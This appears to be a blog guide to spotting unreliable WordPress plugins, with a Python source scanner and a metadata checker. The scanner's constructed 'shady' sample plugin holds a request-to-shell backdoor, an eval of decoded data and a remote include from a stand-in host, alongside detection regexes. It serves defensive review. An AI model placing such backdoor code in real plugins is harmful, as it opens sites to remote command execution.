Even the smallest and simplest WordPress sites need plugins. Akismet is a must if the site has a blog. A security plugin like Defender is not negotiable. And a solid contact form plugin is necessary if you intend to collect leads.

For the most part, though, the commonly used and widely referenced WordPress plugins are known to be reliable. They come with millions of downloads, high ratings, and developers who have worked hard to build a positive reputation in the community by shipping well-maintained plugins and providing top-notch support.

But what about everything else? How do you know whether that apparently popular WordPress plugin (the one that would really do wonders for your site) is reliable? Unfortunately, plugins are responsible for a high percentage of security breaches (Wordfence put that number at 55.9%), so it can feel as though any decision to install one is a dangerous gamble.

What I would like to do now is talk about how you can tell whether a WordPress plugin is unreliable. Specifically, I'm going to share six warning signs you should watch out for that will tell you when it's best not to download one.

6 warning signs that a WordPress plugin is unreliable

I still feel bad about being so hard on WordPress plugins because, really, they are awesome. When coded well and properly maintained, they can do wonderful things inside WordPress. Unfortunately, that is not always the case.

Sometimes you get a plugin that was made by a novice developer hoping to make money, who didn't put in the time to code and maintain it properly. Other times you come across a plugin that is well coded, but one wrong line conflicts with another plugin and breaks your entire site in an instant. And, of course, there is always the risk of a hacker or a bogus WordPress developer getting their hands on it.

So you have to be extra vigilant about what you let in, even if the original developer's intentions were good.

To be diligent, you need to know how to spot the warning signs of a bad WordPress plugin. Start with a vetting process to make sure the plugin is the right one for your site. Then dig deeper to see whether you can spot any of the warning signs.

1. The plugin's source seems strange

Let's start with where you hunt for these WordPress plugins. Say you're interested in a plugin that adds a feature that is a little out of the ordinary. You do a Google search for the feature, and the top results direct you to a number of independent WordPress developer sites that claim to sell a plugin that does just that.

A few warning bells should be ringing in your head at that point. It doesn't necessarily mean the plugin's source can't be trusted. But if you land on the site and it looks like it was built in the early 2000s, and there is no way to contact the developer except through an AOL email address… well, that's a huge red flag.

In general, always look for WordPress plugins that come from trusted sources. Start with the ones shown here:

wordpress plugins.jpeg

If you start there, you will greatly reduce the chances of stumbling onto a bad apple.

2. A tarnished developer reputation

Next, look at the reputation of the plugin developer. You don't necessarily need to know who the person is, where they live, what their education is, or anything else (unless you're curious). What you're looking for here are red flags telling you that something is wrong.

Here are some of the warning signs:

  • They are a new owner of the plugin with no background as a developer. That could mean they bought a plugin popular enough to serve as a vehicle for injecting malicious code into websites: whoever controls the updates reaches every site running the plugin with the next release.
  • A Google search of their name yields no results. Not even their own WordPress site.
  • Or, a Google search of their name returns results, but you see things like "Don't believe [developer's name]" or "[developer's name] is a fraud."
  • Clicking on their name in the WordPress repository or on the CodeCanyon marketplace leads to a website that is seriously outdated and raises its own red flags.

profile codecanyon.jpeg

The good thing about the CodeCanyon marketplace is that it gives plugin authors status badges and rewards based on sales, achievements, and reviews. So if you are really worried about who the person or team behind the plugin is, you can explore the author's profile.

3. The plugin is considered dangerous

Of course, you should also look into the reputation of the WordPress plugin itself. As I said earlier, sometimes the developer never intended to introduce bad code into the plugin; they were simply too inexperienced to know better. So even if the developer has a squeaky-clean image, the plugin may not.

There are a number of things you can check to help verify the security of a WordPress plugin, but for this one I want to focus on explicit reports that a plugin is not safe to use. That means going to Google and searching for words like "dangerous", "hacked", "vulnerability" and "compromised" together with the name of the plugin. Read what you find carefully: a vulnerability that was disclosed and fixed promptly in a new release tells you something different from one that is still open, or from a plugin that was pulled from the repository altogether. If the results confirm unresolved security concerns, walk away.

4. The code seems suspicious

This one might not be the easiest to check, since not everyone knows how to write code for a plugin. But if you are familiar enough with the file structure and guidelines of a plugin, you can at least verify that all the essentials are in place.

You can use the WordPress Codex guide to writing a plugin to do this. Mentally set aside the required boilerplate (the plugin header, the hooks that register it with WordPress) and focus on what's left. If anything looks suspicious to you, such as code that is encoded or obfuscated for no apparent reason, code that pulls in files from a remote server at runtime, or code that passes request parameters straight to a shell, go out there and find a new plugin.
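To make "what's left looks suspicious" concrete, here is an added example (not code from the original post) in Python: it sets the plugin header aside, then greps the remaining PHP for the constructs a reviewer reads first, such as eval() wrapped around a decoder, request data flowing into a shell command, and includes from a remote URL. The two plugin files embedded below are constructed for the example, and the rule set is a heuristic starting point, not a complete malware signature list.

```python
"""Heuristic review of WordPress plugin PHP source for red-flag constructs."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Finding:
    rule: str
    line: int       # 1-based line number in the original file
    snippet: str


# Constructs worth reading closely once the required boilerplate is set aside.
# They are heuristics, not proof of malice: a caching plugin may legitimately
# call gzinflate, but a "greeting" shortcode has no business doing so.
RULES: Dict[str, "re.Pattern"] = {
    # eval() fed by a decoder is the classic way to smuggle a hidden payload
    "eval_of_decoded_payload": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
    "create_function": re.compile(r"\bcreate_function\s*\(", re.I),
    # request parameters flowing straight into a shell: a remote command backdoor
    "request_to_shell": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b",
        re.I),
    "shell_command": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I),
    # code fetched from a remote host at runtime; the site owner never gets to review it
    "remote_include": re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://", re.I),
    # long \xNN or chr() chains usually exist to defeat exactly this kind of review
    "obfuscated_string": re.compile(
        r"(?:\\x[0-9a-fA-F]{2}){8,}|(?:chr\s*\(\s*\d+\s*\)\s*\.\s*){4,}", re.I),
}
# When the specific rule fires, the generic one on the same line adds nothing.
SUBSUMES = {"eval_of_decoded_payload": "eval", "request_to_shell": "shell_command"}

HEADER_RE = re.compile(r"/\*.*?\*/", re.S)


def split_header(src: str) -> Tuple[Dict[str, str], str]:
    """Parse the plugin header comment into a dict and blank it out of the source.

    The header is replaced by the same number of newlines so that line numbers
    reported for the remaining code still match the file on disk.
    """
    match = HEADER_RE.search(src)
    if not match:
        return {}, src
    fields: Dict[str, str] = {}
    for raw in match.group(0).splitlines():
        line = raw.strip(" \t/*")
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    blanked = "\n" * match.group(0).count("\n")
    return fields, src[:match.start()] + blanked + src[match.end():]


def scan_plugin_source(src: str) -> List[Finding]:
    """Return every red-flag construct found outside the plugin header."""
    _, body = split_header(src)
    findings: List[Finding] = []
    for line_no, line in enumerate(body.splitlines(), start=1):
        hits = [rule for rule, pattern in RULES.items() if pattern.search(line)]
        for specific, generic in SUBSUMES.items():
            if specific in hits and generic in hits:
                hits.remove(generic)
        findings.extend(Finding(rule, line_no, line.strip()) for rule in hits)
    return findings


# Constructed sample: a minimal, well-behaved shortcode plugin.
CLEAN_PLUGIN = r"""<?php
/*
Plugin Name: Example Greeting
Description: Adds a [greeting] shortcode.
Version: 1.0.0
Author: Constructed Example
*/
if ( ! defined( 'ABSPATH' ) ) { exit; }

function eg_greeting_shortcode( $atts ) {
    $atts = shortcode_atts( array( 'name' => 'friend' ), $atts, 'greeting' );
    return '<p>Hello, ' . esc_html( $atts['name'] ) . '</p>';
}
add_shortcode( 'greeting', 'eg_greeting_shortcode' );
"""

# Constructed sample: the same plugin with a backdoor bolted on. The base64
# blob is a harmless placeholder; the point is that nothing in a greeting
# widget justifies eval(), a shell call, or a remote include.
SHADY_PLUGIN = r"""<?php
/*
Plugin Name: Example Greeting Pro
Version: 1.0.1
Author: Constructed Example
*/
if ( ! defined( 'ABSPATH' ) ) { exit; }

function egp_init() {
    // Nothing in the plugin description explains why a greeting widget needs this.
    eval( base64_decode( 'ZWNobyAnaGVsbG8nOw==' ) );
    if ( isset( $_REQUEST['egp_cmd'] ) ) {
        system( $_REQUEST['egp_cmd'] );
    }
    include( 'http://example.invalid/loader.txt' );
}
add_action( 'init', 'egp_init' );
"""

if __name__ == "__main__":
    for label, src in (("clean", CLEAN_PLUGIN), ("shady", SHADY_PLUGIN)):
        header, _ = split_header(src)
        print(f"[{label}] {header.get('Plugin Name')} {header.get('Version')}")
        for f in scan_plugin_source(src):
            print(f"  line {f.line}: {f.rule}: {f.snippet}")
```

Run the script against a real plugin by reading its main file into `scan_plugin_source`. A match is a reason to read that line in context, not a verdict: legitimate plugins do sometimes need `exec()` or `gzinflate()`, but they document why, and the encoded blob is never the only thing the plugin does.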

5. Not enough downloads

On WordPress, you will be able to see the number of active installations:

Active installation WordPress.jpeg


This is useful because you aren't looking at raw downloads, which would include everyone who installed the plugin and then deleted it. Active installations is the number of websites the plugin is currently running on, which is a much better indicator of reliability.

Plugin marketplaces show numbers like total sales, which are useful too, although you would need other data to confirm that they really mean something:

sales of plugins.jpeg

In general, I suggest avoiding WordPress plugins with fewer than 1,000 active installations. Really, you should want a number higher than that (probably over 5,000), but sometimes that isn't possible: the plugin may add a brand new feature that hasn't caught on yet, or support something that isn't commonly used. It also depends on how recently the plugin was released.

6. Incompatible with the latest version of WordPress

When reviewing WordPress plugins in the repository, there are two stats you should look at when it comes to the WordPress version:

wordpress version testee.jpeg

The "Requires WordPress Version" field tells you the minimum version of WordPress the plugin needs in order to work properly. That said, you should never let your site run on an outdated version of WordPress anyway.

"Tested up to" is the other field to look at here. It tells you whether the developer has verified the plugin against the latest core release. If the plugin has not yet been tested with the current version, skip it.

And if you see the repository's notice that the plugin hasn't been tested with the latest three major releases of WordPress, run:

view plugins WordPress.jpeg
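As an added example (not code from the original post), here is a Python script that applies the thresholds from signs 5 and 6 to the metadata the WordPress.org repository exposes for a plugin. The field names (`active_installs`, `tested`, `requires`) follow the public plugin-information API; the endpoint URL is assumed from that API and is not contacted here, so the script runs offline. The two sample records and the list of recent core releases are constructed for the example.

```python
"""Check a plugin's repository metadata against the install and version thresholds above."""
import json
import re
from typing import Dict, List, Sequence, Tuple
from urllib.parse import urlencode
from urllib.request import urlopen

# Public plugin-information endpoint of the WordPress.org repository
# (assumed from the documented API; not called in the offline example below).
PLUGIN_INFO_API = "https://api.wordpress.org/plugins/info/1.2/"


def fetch_plugin_info(slug: str) -> Dict:
    """Download the live metadata record for a plugin slug (needs network access)."""
    query = urlencode({"action": "plugin_information", "request[slug]": slug})
    with urlopen(f"{PLUGIN_INFO_API}?{query}", timeout=10) as resp:
        return json.load(resp)


def version_tuple(version: str) -> Tuple[int, ...]:
    """'6.5.2' -> (6, 5, 2). Stops at the first non-numeric piece ('6.5-RC1' -> (6, 5))."""
    parts: List[int] = []
    for piece in version.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group(0)))
    return tuple(parts)


def assess_plugin(info: Dict, site_core: str, recent_majors: Sequence[str],
                  min_installs: int = 1000, comfortable_installs: int = 5000) -> Dict[str, str]:
    """Return {flag_code: explanation} for the warning signs the metadata triggers.

    recent_majors lists the latest WordPress major releases (first two version
    components), newest first, e.g. ("6.5", "6.4", "6.3").
    """
    flags: Dict[str, str] = {}

    installs = int(info.get("active_installs") or 0)
    if installs < min_installs:
        flags["too_few_installs"] = f"{installs} active installs (below {min_installs})"
    elif installs < comfortable_installs:
        flags["modest_installs"] = f"{installs} active installs; confirm with ratings and support history"

    tested = info.get("tested") or ""
    if not tested:
        flags["no_tested_version"] = "plugin declares no 'Tested up to' version"
    else:
        tested_major = version_tuple(tested)[:2]
        if tested_major < version_tuple(recent_majors[0])[:2]:
            flags["not_tested_on_latest"] = f"tested up to {tested}; latest core is {recent_majors[0]}"
        if tested_major not in {version_tuple(v)[:2] for v in recent_majors}:
            flags["not_tested_in_recent_majors"] = (
                f"not tested with any of the latest {len(recent_majors)} major releases")

    requires = info.get("requires") or ""
    if requires and version_tuple(requires) > version_tuple(site_core):
        flags["site_too_old"] = f"requires WordPress {requires}; this site runs {site_core}"
    return flags


# Constructed records in the shape of the API response (values are invented).
SAMPLE_ESTABLISHED = {
    "name": "Constructed Contact Form", "slug": "constructed-contact-form",
    "version": "4.2.1", "active_installs": 2_000_000, "downloaded": 95_000_000,
    "requires": "5.9", "tested": "6.5.2", "rating": 94, "num_ratings": 1800,
    "last_updated": "2024-04-30 1:10pm GMT",
}
SAMPLE_ABANDONED = {
    "name": "Constructed Fancy Widget", "slug": "constructed-fancy-widget",
    "version": "0.3", "active_installs": 400, "downloaded": 12_000,
    "requires": "4.7", "tested": "5.8.1", "rating": 80, "num_ratings": 3,
    "last_updated": "2021-09-02 9:00am GMT",
}
RECENT_MAJORS = ("6.5", "6.4", "6.3")   # assumed current core releases, newest first

if __name__ == "__main__":
    for record in (SAMPLE_ESTABLISHED, SAMPLE_ABANDONED):
        flags = assess_plugin(record, site_core="6.5", recent_majors=RECENT_MAJORS)
        verdict = "looks fine on these checks" if not flags else "warning signs"
        print(f"{record['name']}: {verdict}")
        for code, why in flags.items():
            print(f"  - {code}: {why}")
```

For a live check, replace the sample record with `fetch_plugin_info("akismet")` or another slug and pass the core version your site actually runs as `site_core`. The thresholds are the article's rules of thumb, so a flag is a prompt to look closer (ratings, support threads, changelog), not an automatic rejection.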

There are many more signals to look out for, but these will already give you a quick idea of the quality of a plugin.